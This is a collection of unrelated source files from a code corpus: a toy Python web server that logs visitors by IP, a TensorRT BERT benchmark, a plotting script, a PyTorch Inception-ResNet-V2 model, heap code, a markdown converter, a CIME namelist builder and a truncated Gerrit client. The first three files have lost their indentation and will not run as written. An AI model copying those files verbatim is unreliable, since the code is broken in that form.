['Mac_PowerPC','Macintosh'],
['QNX'],
['BeOS'],
['OS/2'],
['nuhk','Googlebot','Yammybot','Openbot','Slurp','MSNBot','Ask Jeeves/Teoma','ia_archiver']
]
i = 0
for ua_vals in ua_list:
for ua_val in ua_vals:
if ua_val in line:
return os_list[i]
i += 1
return 'OS not detected'
def map_browser(line):
br_name = [
'Firefox',
'Seamonkey',
'Chrome',
'Chromium',
'Safari',
'Opera',
'Internet Explorer'
]
ua_str = [
['Firefox'],
['Seamonkey'],
['Chrome'],
['Chromium'],
['Safari'],
['OPR', 'Opera'],
['MSIE']
]
i = 0
for ua_s in ua_str:
for ua in ua_s:
if ua in line:
return br_name[i]
i += 1
return 'Browser not detected'
def detect_system(lines):
info = []
for line in lines:
if 'User-Agent' in line:
return map_browser(line), map_os(line)
    return 'Browser not detected', 'OS not detected'
def hist(addr, path):
try:
f = open('ip-log.txt','a+')
c = open('ip-log.txt','r')
contents = c.read()
if addr not in contents:
f.write(addr + '\n')
p = open(str(addr),'a+')
cp = open(str(addr), 'r')
cont = cp.read()
p.write(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') + '\t' + path + '\n')
cp.close()
p.close()
c.close()
f.close()
except FileNotFoundError:
print('Error opening the file in hist()')
def get_history(addr):
try:
f = open(str(addr), 'r')
contents = f.readlines()
h = open('history.html','r')
l = h.read(1024)
data = ''
while (l):
data += l
l = h.read(1024)
h.close()
f.close()
data = data.replace('No history', '<br>'.join(contents))
return data
except FileNotFoundError:
print('Error opening the file in get_history()')
def handle_request(client_connection, client_address):
try:
request = client_connection.recv(1024)
reqstr = request.decode()
first_line = reqstr.splitlines()[0]
all_lines = reqstr.splitlines()
browser_type, system_type = detect_system(all_lines)
req_type = first_line.split()[0]
path = first_line.split()[1]
hist(client_address, path)
if req_type == 'GET':
http_response = 'HTTP/1.1 200 OK\nContent-Type: text/html\n\n'
client_connection.sendall(http_response.encode())
if path == '/':
data = get_file('/index.html', browser_type, system_type)
elif path == '/history.html':
data = get_history(client_address)
else:
data = get_file(path, browser_type, system_type)
client_connection.sendall(data.encode())
else:
http_response = 'HTTP/1.1 404 NotFound\nContent-Type: text/html\n\n'
client_connection.sendall(http_response.encode())
data = get_file('404.html', browser_type, system_type)
client_connection.sendall(data.encode())
except IndexError:
pass
def serve_forever():
listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_socket.bind(SERVER_ADDRESS)
listen_socket.listen(REQUEST_QUEUE_SIZE)
print('Serving HTTP on port {port} ...'.format(port=PORT))
signal.signal(signal.SIGCHLD, grim_reaper)
while True:
try:
client_connection, client_address = listen_socket.accept()
except IOError as e:
code, msg = e.args
# restart 'accept' if it was interrupted
if code == errno.EINTR:
continue
else:
raise
pid = os.fork()
if pid == 0: # child
listen_socket.close() # close child listen socket copy
handle_request(client_connection, client_address[0])
client_connection.close()
os._exit(0)
else: # parent
client_connection.close() # close parent copy and loop over
if __name__ == '__main__':
serve_forever()
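# Usage sketch (illustrative only): the script name and port below are
# hypothetical; the server defaults to port 80 when no argument is given.
#
#   python webserver.py 8080
#   curl http://localhost:8080/               # serves index.html
#   curl http://localhost:8080/history.html   # per-client request history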
|
the-stack_106_22134
|
#
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import ctypes
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import numpy as np
TRT_LOGGER = trt.Logger(trt.Logger.ERROR)
class DeviceBuffer(object):
def __init__(self, shape, dtype=trt.int32):
self.buf = cuda.mem_alloc(trt.volume(shape) * dtype.itemsize)
def binding(self):
return int(self.buf)
def free(self):
self.buf.free()
def main():
parser = argparse.ArgumentParser(description='BERT Inference Benchmark')
parser.add_argument("-e", "--engine", help='Path to BERT TensorRT engine')
parser.add_argument('-b', '--batch-size', default=[], action="append", help='Batch size(s) to benchmark. Can be specified multiple times for more than one batch size. This script assumes that the engine has been built with one optimization profile for each batch size, and that these profiles are in order of increasing batch size.', type=int)
parser.add_argument('-s', '--sequence-length', default=128, help='Sequence length of the BERT model', type=int)
parser.add_argument('-i', '--iterations', default=200, help='Number of iterations to run when benchmarking each batch size.', type=int)
parser.add_argument('-w', '--warm-up-runs', default=10, help='Number of iterations to run prior to benchmarking.', type=int)
parser.add_argument('-r', '--random-seed', required=False, default=12345, help='Random seed.', type=int)
args, _ = parser.parse_known_args()
args.batch_size = args.batch_size or [1]
# Import necessary plugins for BERT TensorRT
ctypes.CDLL("libnvinfer_plugin.so", mode=ctypes.RTLD_GLOBAL)
with open(args.engine, 'rb') as f, trt.Runtime(TRT_LOGGER) as runtime, runtime.deserialize_cuda_engine(f.read()) as engine, engine.create_execution_context() as context:
# Allocate buffers large enough to store the largest batch size
max_input_shape = (args.sequence_length * max(args.batch_size), )
max_output_shape = (args.sequence_length * max(args.batch_size), 2, 1, 1)
buffers = [
DeviceBuffer(max_input_shape),
DeviceBuffer(max_input_shape),
DeviceBuffer((max(args.batch_size) + 1, )),
DeviceBuffer((args.sequence_length, )),
DeviceBuffer(max_output_shape)
]
# Prepare random input
pseudo_vocab_size = 30522
pseudo_type_vocab_size = 2
np.random.seed(args.random_seed)
test_word_ids = np.random.randint(0, pseudo_vocab_size, (args.sequence_length * max(args.batch_size)), dtype=np.int32)
test_segment_ids = np.random.randint(0, pseudo_type_vocab_size, (args.sequence_length * max(args.batch_size)), dtype=np.int32)
test_cu_seq_lens = np.arange(0, args.sequence_length * max(args.batch_size) + 1, args.sequence_length, dtype=np.int32)
# Copy input h2d
cuda.memcpy_htod(buffers[0].buf, test_word_ids.ravel())
cuda.memcpy_htod(buffers[1].buf, test_segment_ids.ravel())
cuda.memcpy_htod(buffers[2].buf, test_cu_seq_lens.ravel())
bench_times = {}
for idx, batch_size in enumerate(sorted(args.batch_size)):
context.active_optimization_profile = 0
# Each profile has unique bindings
bindings = [buf.binding() for buf in buffers]
shapes = {
"input_ids": (args.sequence_length * batch_size, ),
"segment_ids": (args.sequence_length * batch_size, ),
"cu_seqlens": (batch_size + 1, ),
"max_seqlen": (args.sequence_length, ),
}
for binding, shape in shapes.items():
context.set_binding_shape(engine[binding], shape)
assert context.all_binding_shapes_specified
# Inference
total_time = 0
start = cuda.Event()
end = cuda.Event()
stream = cuda.Stream()
# Warmup
for _ in range(args.warm_up_runs):
context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
stream.synchronize()
# Timing loop
times = []
for _ in range(args.iterations):
start.record(stream)
context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
end.record(stream)
stream.synchronize()
times.append(end.time_since(start))
# Compute average time, 95th percentile time and 99th percentile time.
bench_times[batch_size] = times
[b.free() for b in buffers]
for batch_size, times in bench_times.items():
total_time = sum(times)
avg_time = total_time / float(len(times))
times.sort()
percentile95 = times[int(len(times) * 0.95)]
percentile99 = times[int(len(times) * 0.99)]
print("Running {:} iterations with Batch Size: {:}\n\tTotal Time: {:} ms \tAverage Time: {:} ms\t95th Percentile Time: {:} ms\t99th Percentile Time: {:}".format(args.iterations, batch_size, total_time, avg_time, percentile95, percentile99))
if __name__ == '__main__':
main()
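# Usage sketch (illustrative only): the script name, engine path and batch sizes
# below are hypothetical. The engine must contain one optimization profile per
# batch size, built in increasing order, and libnvinfer_plugin.so must be
# loadable on this system.
#
#   python perf_varseqlen.py -e bert_large_seqlen384.engine -b 1 -b 8 -s 384 -i 200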
|
the-stack_106_22135
|
import os
import sys
# add source
sys.path.insert(0, os.path.abspath('./sphinxext'))
sys.path.append('/Users/mdl-admin/Desktop/mdl')
# import package
import imhr
# create image
import matplotlib.pyplot as plt
import matplotlib.image as image
from pathlib import Path
# path
path = '%s/dist/roi/output/img/bounds/'%(Path(imhr.__file__).parent)
# draw plot
#plt.figure(figsize=(20,6), dpi=400, facecolor='#ffffff')
fig, (axes) = plt.subplots(1, 4, sharey=True)
# names
shape = 'hull'
filenames = ['2550_%s.png'%(shape),'2691_%s.png'%(shape),'4640_%s.png'%(shape),'9421_%s.png'%(shape)]
# draw and save
for idx, itm in enumerate(zip(axes, filenames)):
ax, file, = itm
## load roi
im = image.imread('%s/%s'%(path, file))
ax.imshow(im)
ax.grid(True)
ax.set_facecolor('#f9f9f9')
# labels
if idx == 0: ax.set_ylabel('Screen Y (pixels)', fontsize=8)
ax.set_xlabel('Screen X (pixels)', fontsize=8)
ax.tick_params(labelsize=6, width=1, length=4)
# save
#plt.tight_layout()
plt.subplots_adjust(wspace=0.1)
plt.show()
|
the-stack_106_22138
|
""" Pytorch Inception-Resnet-V2 implementation
Sourced from https://github.com/Cadene/tensorflow-model-zoo.torch (MIT License) which is
based upon Google's Tensorflow implementation and pretrained weights (Apache 2.0 License)
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from .registry import register_model
from .helpers import load_pretrained
from .adaptive_avgmax_pool import select_adaptive_pool2d
from .constants import IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD
__all__ = ['InceptionResnetV2']
default_cfgs = {
# ported from http://download.tensorflow.org/models/inception_resnet_v2_2016_08_30.tar.gz
'inception_resnet_v2': {
'url': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/inception_resnet_v2-940b1cd6.pth',
'num_classes': 1001, 'input_size': (3, 299, 299), 'pool_size': (8, 8),
'crop_pct': 0.8975, 'interpolation': 'bicubic',
'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,
'first_conv': 'conv2d_1a.conv', 'classifier': 'classif',
},
# ported from http://download.tensorflow.org/models/ens_adv_inception_resnet_v2_2017_08_18.tar.gz
'ens_adv_inception_resnet_v2': {
'url': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/ens_adv_inception_resnet_v2-2592a550.pth',
'num_classes': 1001, 'input_size': (3, 299, 299), 'pool_size': (8, 8),
'crop_pct': 0.8975, 'interpolation': 'bicubic',
'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,
'first_conv': 'conv2d_1a.conv', 'classifier': 'classif',
}
}
class BasicConv2d(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride, padding=0):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(
in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(out_planes, eps=.001)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class Mixed_5b(nn.Module):
def __init__(self):
super(Mixed_5b, self).__init__()
self.branch0 = BasicConv2d(192, 96, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(192, 48, kernel_size=1, stride=1),
BasicConv2d(48, 64, kernel_size=5, stride=1, padding=2)
)
self.branch2 = nn.Sequential(
BasicConv2d(192, 64, kernel_size=1, stride=1),
BasicConv2d(64, 96, kernel_size=3, stride=1, padding=1),
BasicConv2d(96, 96, kernel_size=3, stride=1, padding=1)
)
self.branch3 = nn.Sequential(
nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False),
BasicConv2d(192, 64, kernel_size=1, stride=1)
)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class Block35(nn.Module):
def __init__(self, scale=1.0):
super(Block35, self).__init__()
self.scale = scale
self.branch0 = BasicConv2d(320, 32, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(320, 32, kernel_size=1, stride=1),
BasicConv2d(32, 32, kernel_size=3, stride=1, padding=1)
)
self.branch2 = nn.Sequential(
BasicConv2d(320, 32, kernel_size=1, stride=1),
BasicConv2d(32, 48, kernel_size=3, stride=1, padding=1),
BasicConv2d(48, 64, kernel_size=3, stride=1, padding=1)
)
self.conv2d = nn.Conv2d(128, 320, kernel_size=1, stride=1)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
out = self.conv2d(out)
out = out * self.scale + x
out = self.relu(out)
return out
class Mixed_6a(nn.Module):
def __init__(self):
super(Mixed_6a, self).__init__()
self.branch0 = BasicConv2d(320, 384, kernel_size=3, stride=2)
self.branch1 = nn.Sequential(
BasicConv2d(320, 256, kernel_size=1, stride=1),
BasicConv2d(256, 256, kernel_size=3, stride=1, padding=1),
BasicConv2d(256, 384, kernel_size=3, stride=2)
)
self.branch2 = nn.MaxPool2d(3, stride=2)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
return out
class Block17(nn.Module):
def __init__(self, scale=1.0):
super(Block17, self).__init__()
self.scale = scale
self.branch0 = BasicConv2d(1088, 192, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(1088, 128, kernel_size=1, stride=1),
BasicConv2d(128, 160, kernel_size=(1, 7), stride=1, padding=(0, 3)),
BasicConv2d(160, 192, kernel_size=(7, 1), stride=1, padding=(3, 0))
)
self.conv2d = nn.Conv2d(384, 1088, kernel_size=1, stride=1)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
out = torch.cat((x0, x1), 1)
out = self.conv2d(out)
out = out * self.scale + x
out = self.relu(out)
return out
class Mixed_7a(nn.Module):
def __init__(self):
super(Mixed_7a, self).__init__()
self.branch0 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 384, kernel_size=3, stride=2)
)
self.branch1 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 288, kernel_size=3, stride=2)
)
self.branch2 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 288, kernel_size=3, stride=1, padding=1),
BasicConv2d(288, 320, kernel_size=3, stride=2)
)
self.branch3 = nn.MaxPool2d(3, stride=2)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class Block8(nn.Module):
def __init__(self, scale=1.0, noReLU=False):
super(Block8, self).__init__()
self.scale = scale
self.noReLU = noReLU
self.branch0 = BasicConv2d(2080, 192, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(2080, 192, kernel_size=1, stride=1),
BasicConv2d(192, 224, kernel_size=(1, 3), stride=1, padding=(0, 1)),
BasicConv2d(224, 256, kernel_size=(3, 1), stride=1, padding=(1, 0))
)
self.conv2d = nn.Conv2d(448, 2080, kernel_size=1, stride=1)
if not self.noReLU:
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
out = torch.cat((x0, x1), 1)
out = self.conv2d(out)
out = out * self.scale + x
if not self.noReLU:
out = self.relu(out)
return out
class InceptionResnetV2(nn.Module):
def __init__(self, num_classes=1001, in_chans=3, drop_rate=0., global_pool='avg'):
super(InceptionResnetV2, self).__init__()
self.drop_rate = drop_rate
self.global_pool = global_pool
self.num_classes = num_classes
self.num_features = 1536
self.conv2d_1a = BasicConv2d(in_chans, 32, kernel_size=3, stride=2)
self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.maxpool_3a = nn.MaxPool2d(3, stride=2)
self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
self.maxpool_5a = nn.MaxPool2d(3, stride=2)
self.mixed_5b = Mixed_5b()
self.repeat = nn.Sequential(
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17)
)
self.mixed_6a = Mixed_6a()
self.repeat_1 = nn.Sequential(
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10)
)
self.mixed_7a = Mixed_7a()
self.repeat_2 = nn.Sequential(
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20)
)
self.block8 = Block8(noReLU=True)
self.conv2d_7b = BasicConv2d(2080, self.num_features, kernel_size=1, stride=1)
        # NOTE: some variants/checkpoints of this model may use 'last_linear' as the name of the final fully-connected classifier layer
self.classif = nn.Linear(self.num_features, num_classes)
def get_classifier(self):
return self.classif
def reset_classifier(self, num_classes, global_pool='avg'):
self.global_pool = global_pool
self.num_classes = num_classes
del self.classif
if num_classes:
self.classif = torch.nn.Linear(self.num_features, num_classes)
else:
self.classif = None
def forward_features(self, x, pool=True):
x = self.conv2d_1a(x)
x = self.conv2d_2a(x)
x = self.conv2d_2b(x)
x = self.maxpool_3a(x)
x = self.conv2d_3b(x)
x = self.conv2d_4a(x)
x = self.maxpool_5a(x)
x = self.mixed_5b(x)
x = self.repeat(x)
x = self.mixed_6a(x)
x = self.repeat_1(x)
x = self.mixed_7a(x)
x = self.repeat_2(x)
x = self.block8(x)
x = self.conv2d_7b(x)
if pool:
x = select_adaptive_pool2d(x, self.global_pool)
#x = F.avg_pool2d(x, 8, count_include_pad=False)
x = x.view(x.size(0), -1)
return x
def forward(self, x):
x = self.forward_features(x, pool=True)
if self.drop_rate > 0:
x = F.dropout(x, p=self.drop_rate, training=self.training)
x = self.classif(x)
return x
@register_model
def inception_resnet_v2(pretrained=False, num_classes=1000, in_chans=3, **kwargs):
r"""InceptionResnetV2 model architecture from the
`"InceptionV4, Inception-ResNet..." <https://arxiv.org/abs/1602.07261>` paper.
"""
default_cfg = default_cfgs['inception_resnet_v2']
model = InceptionResnetV2(num_classes=num_classes, in_chans=in_chans, **kwargs)
model.default_cfg = default_cfg
if pretrained:
load_pretrained(model, default_cfg, num_classes, in_chans)
return model
@register_model
def ens_adv_inception_resnet_v2(pretrained=False, num_classes=1000, in_chans=3, **kwargs):
r""" Ensemble Adversarially trained InceptionResnetV2 model architecture
As per https://arxiv.org/abs/1705.07204 and
https://github.com/tensorflow/models/tree/master/research/adv_imagenet_models.
"""
default_cfg = default_cfgs['ens_adv_inception_resnet_v2']
model = InceptionResnetV2(num_classes=num_classes, in_chans=in_chans, **kwargs)
model.default_cfg = default_cfg
if pretrained:
load_pretrained(model, default_cfg, num_classes, in_chans)
return model
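# Usage sketch (illustrative only): build the 1000-class variant without weights
# and run a random 299x299 image through it.
#
# model = inception_resnet_v2(pretrained=False, num_classes=1000)
# model.eval()
# with torch.no_grad():
#     logits = model(torch.randn(1, 3, 299, 299))  # -> torch.Size([1, 1000])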
|
the-stack_106_22140
|
# The corresponding complete binary tree for this array of elements [4, 10, 3, 5, 1] will be:
#
# 4
# / \
# 10 3
# / \
# 5 1
#
# Note:
# Root is at index 0 in array.
# Left child of i-th node is at (2*i + 1)th index.
# Right child of i-th node is at (2*i + 2)th index.
# Parent of i-th node is at (i-1)/2 index.
def heapify(arr, n, i):
largest = i
l = (2*i) + 1
r = (2*i) + 2
# If left child is larger than root
if l < n and arr[l] > arr[largest]:
largest = l
# If right child is larger than largest so far
if r < n and arr[r] > arr[largest]:
largest = r
if largest != i:
arr[i], arr[largest] = arr[largest], arr[i]
heapify(arr, n, largest)
def build_heap(arr, n):
start_index = (n//2 - 1)
for i in range(start_index, -1, -1):
heapify(arr, n, i)
def print_heap(arr, n):
print("Array representation of Heap is:")
for i in range(n):
print(arr[i], end=" ")
print()
arr = [1, 3, 5, 4, 6, 13, 10, 9, 8, 15, 17]
n = len(arr)
build_heap(arr, n)
print_heap(arr, n)
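def heap_sort(arr):
    # Illustrative extension (not in the original snippet): sort in place by
    # repeatedly swapping the max (root) to the end of the array and
    # re-heapifying the shrinking prefix, reusing build_heap/heapify above.
    n = len(arr)
    build_heap(arr, n)
    for end in range(n - 1, 0, -1):
        arr[0], arr[end] = arr[end], arr[0]
        heapify(arr, end, 0)
    return arr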
|
the-stack_106_22144
|
from typing import Generator, Literal
from app.element.block import Block, ParseResult, CodeBlock, CodeChildBlock
from app.converter.block_converter import BlockConverter
class Converter:
""" 複数行におよぶBlock要素をHTMLタグと対応した形へ変換することを責務に持つ """
def __init__(self):
self._block_converter = BlockConverter()
def convert(self, markdown_result: ParseResult) -> ParseResult:
"""
        To keep the builder's responsibility small, convert the markdown parse result
        into a form that the builder can interpret easily.
        :param markdown_result: markdown parse result to convert
        :return: conversion result
"""
convert_result_content = []
        # Group elements, such as code blocks, whose notation treats everything inside
        # its range as a single unit; more concretely, convert them into Block elements
        # of the same kind so they become the converter's unit of processing
grouped_markdown_result = group_same_range_blocks(markdown_result.content)
        # Split the parse result into runs of same-type Blocks before converting;
        # this way the converter only has to merge each run and emit the result
for convert_target in split_to_convert_target(grouped_markdown_result):
convert_result_content += self._block_converter.convert(convert_target)
return ParseResult(content=convert_result_content)
def group_same_range_blocks(blocks: list[Block]) -> list[Block]:
"""
    Group elements, such as code blocks, whose contents between the start and end
    markers are treated as the same Block element
    :param blocks: markdown parse result
    :return: result in which the range-based Block elements have been grouped
"""
    # Tracks which kind of Block range is currently being processed;
    # Block elements inside a range are grouped according to this mode
mode: Literal['Block'] | Literal['CodeBlock'] = 'Block'
grouped_blocks = []
for block in blocks:
        # Code block
        # The opening line is appended to the grouped list as-is so that attributes
        # such as the language can be referenced later
        # Opening line
if mode == 'Block' and isinstance(block, CodeBlock):
grouped_blocks.append(block)
mode = 'CodeBlock'
continue
        # Inside the block
if mode == 'CodeBlock' and not isinstance(block, CodeBlock):
grouped_blocks.append(CodeChildBlock(children=block.children))
continue
        # Closing line
if mode == 'CodeBlock' and isinstance(block, CodeBlock):
mode = 'Block'
continue
grouped_blocks.append(block)
return grouped_blocks
def split_to_convert_target(blocks: list[Block]) -> Generator[list[Block], None, None]:
"""
    Split the markdown parse result into the converter's units of conversion
    :param blocks: markdown parse result
    :return: yields one converter unit each time the generator is iterated
"""
    # Splitting the list by start/end indices produces the sublists directly, so there
    # is no need for the tedious bookkeeping of re-initialising an accumulator each time
start = 0
end = 0
for block in blocks:
        # Blocks of the same type can be handled by the same converter, so batch them together
if block.is_same_type(blocks[start]):
end += 1
continue
        # When a different Block type appears, yielding the elements from the start
        # index up to the end index gives a sublist made up of a single Block type.
        # By processing these runs together, the converter can merge multi-line Block
        # elements such as lists and quotes
yield blocks[start: end]
start = end
end += 1
    # If the loop ends on a run of identical blocks, the yield inside the loop cannot
    # return the remaining contents of the list, so yield the leftover elements
if start != end:
yield blocks[start: end]
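# Usage sketch (illustrative only): "parsed" stands in for whatever produces the
# ParseResult (e.g. the project's markdown parser, which is not shown here).
#
# converter = Converter()
# html_ready = converter.convert(parsed)  # ParseResult with grouped, converted blocks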
|
the-stack_106_22145
|
"""
common implementation for building namelist commands
These are used by components/<model_type>/<component>/cime_config/buildnml
"""
from CIME.XML.standard_module_setup import *
from CIME.utils import expect, parse_args_and_handle_standard_logging_options, setup_standard_logging_options
import sys, os, argparse
logger = logging.getLogger(__name__)
###############################################################################
def parse_input(argv):
###############################################################################
parser = argparse.ArgumentParser()
setup_standard_logging_options(parser)
parser.add_argument("caseroot", default=os.getcwd(),
help="Case directory")
args = parse_args_and_handle_standard_logging_options(argv, parser)
return args.caseroot
###############################################################################
#pylint: disable=unused-argument
def build_xcpl_nml(case, caseroot, compname):
###############################################################################
compclasses = case.get_values("COMP_CLASSES")
compclass = None
for compclass in compclasses:
if case.get_value("COMP_{}".format(compclass)) == compname:
break
expect(compclass is not None,
"Could not identify compclass for compname {}".format(compname))
rundir = case.get_value("RUNDIR")
comp_interface = case.get_value("COMP_INTERFACE")
if comp_interface != "nuopc":
ninst = case.get_value("NINST_{}".format(compclass.upper()))
else:
ninst = case.get_value("NINST")
if not ninst:
ninst = 1
nx = case.get_value("{}_NX".format(compclass.upper()))
ny = case.get_value("{}_NY".format(compclass.upper()))
if compname == "xrof":
flood_mode = case.get_value('XROF_FLOOD_MODE')
extras = []
dtype = 1
npes = 0
length = 0
if compname == "xatm":
if ny == 1:
dtype = 2
extras = [["24",
"ncpl number of communications w/coupler per dat"],
["0.0",
"simul time proxy (secs): time between cpl comms"]]
elif compname == "xglc" or compname == "xice":
dtype = 2
elif compname == "xlnd":
dtype = 11
elif compname == "xocn":
dtype = 4
elif compname == "xrof":
dtype = 11
if flood_mode == "ACTIVE":
extras = [[".true.", "flood flag"]]
else:
extras = [[".false.", "flood flag"]]
for i in range(1, ninst + 1):
# If only 1 file, name is 'compclass_in'
# otherwise files are 'compclass_in0001', 'compclass_in0002', etc
if ninst == 1:
filename = os.path.join(rundir, "{}_in".format(compname))
else:
filename = os.path.join(rundir, "{}_in_{:04d}".format(compname, i))
with open(filename, 'w') as infile:
infile.write("{:<20d} ! i-direction global dimension\n".format(nx))
infile.write("{:<20d} ! j-direction global dimension\n".format(ny))
infile.write("{:<20d} ! decomp_type 1=1d-by-lat, 2=1d-by-lon, 3=2d, 4=2d evensquare, 11=segmented\n".format(dtype))
infile.write("{:<20d} ! num of pes for i (type 3 only)\n".format(npes))
infile.write("{:<20d} ! length of segments (type 4 only)\n".format(length))
for extra in extras:
#infile.write("{:-20s} ! {}\n".format(extra[0], extra[1]))
infile.write("{:<20s} ! {}\n".format(extra[0], extra[1]))
###############################################################################
def create_namelist_infile(case, user_nl_file, namelist_infile, infile_text=""):
###############################################################################
lines_input = []
if os.path.isfile(user_nl_file):
with open(user_nl_file, "r") as file_usernl:
lines_input = file_usernl.readlines()
else:
logger.warning("WARNING: No file {} found in case directory".format(user_nl_file))
lines_output = []
lines_output.append("&comp_inparm \n")
if infile_text:
lines_output.append(infile_text)
logger.debug("file_infile {} ".format(infile_text))
for line in lines_input:
match1 = re.search(r"^[\&\/\!]", line)
match2 = re.search(r"\$([\w\_])+", line)
if match1 is None and match2 is not None:
line = case.get_resolved_value(line)
if match1 is None:
lines_output.append(line)
lines_output.append("/ \n")
with open(namelist_infile, "w") as file_infile:
file_infile.write("\n".join(lines_output))
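# Usage sketch (illustrative only): "case" is a CIME Case object and the file
# names and namelist text below are hypothetical.
#
# create_namelist_infile(case, 'user_nl_xatm_0001',
#                        'Buildconf/xatmconf/cesm_namelist',
#                        infile_text=' ncpl = 24\n')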
|
the-stack_106_22146
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple client for the Gerrit REST API.
Example usage:
./gerrit_client.py -j /tmp/out.json -f json \
-u https://chromium.googlesource.com/chromium/src/+log
"""
import argparse
import json
import logging
import os
import sys
import tarfile
import time
import urllib
import urlparse
DEPOT_TOOLS = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir,
os.pardir))
sys.path.insert(0, DEPOT_TOOLS)
from gerrit_util import CreateHttpConn, ReadHttpResponse, ReadHttpJsonResponse
def reparse_url(parsed_url, query_params):
return urlparse.ParseResult(
scheme=parsed_url.scheme,
netloc=parsed_url.netloc,
path=parsed_url.path,
params=parsed_url.params,
fragment=parsed_url.fragment,
query=urllib.urlencode(query_params, doseq=True))
def gitiles_get(parsed_url, handler, attempts):
# This insanity is due to CreateHttpConn interface :(
host = parsed_url.netloc
path = parsed_url.path
if parsed_url.query:
path += '?%s' % (parsed_url.query, )
retry_delay_seconds = 1
attempt = 1
while True:
try:
return handler(CreateHttpConn(host, path))
except Exception as e:
if attempt >= attempts:
raise
logging.exception('Failed to perform Gitiles operation: %s', e)
# Retry from previous loop.
logging.error('Sleeping %d seconds before retry (%d/%d)...',
retry_delay_seconds, attempt, attempts)
time.sleep(retry_delay_seconds)
retry_delay_seconds *= 2
attempt += 1
def fetch_log_with_paging(query_params, limit, fetch):
"""Fetches log, possibly requesting multiple pages to do so.
Args:
query_params (dict): Parameters to use in the request.
limit (int): Page size.
fetch (function): Function to use to make the requests.
Returns:
Dict with key "log", whose value is a list of commits.
"""
# Log api returns {'log': [list of commits], 'next': hash}.
last_result = fetch(query_params)
commits = last_result['log']
while last_result.get('next') and len(commits) < limit:
query_params['s'] = last_result.get('next')
last_result = fetch(query_params)
# The first commit in `last_result` is not necessarily the parent of the
# last commit in result so far! This is because log command can be done on
# one file object, for example:
# https://gerrit.googlesource.com/gitiles/+log/1c21279f337da8130/COPYING
# Even when getting log for the whole repository, there could be merge
# commits.
commits.extend(last_result['log'])
# Use 'next' field (if any) from `last_result`, but commits aggregated
# from all the results. This essentially imitates paging with at least
# `limit` page size.
last_result['log'] = commits
logging.debug(
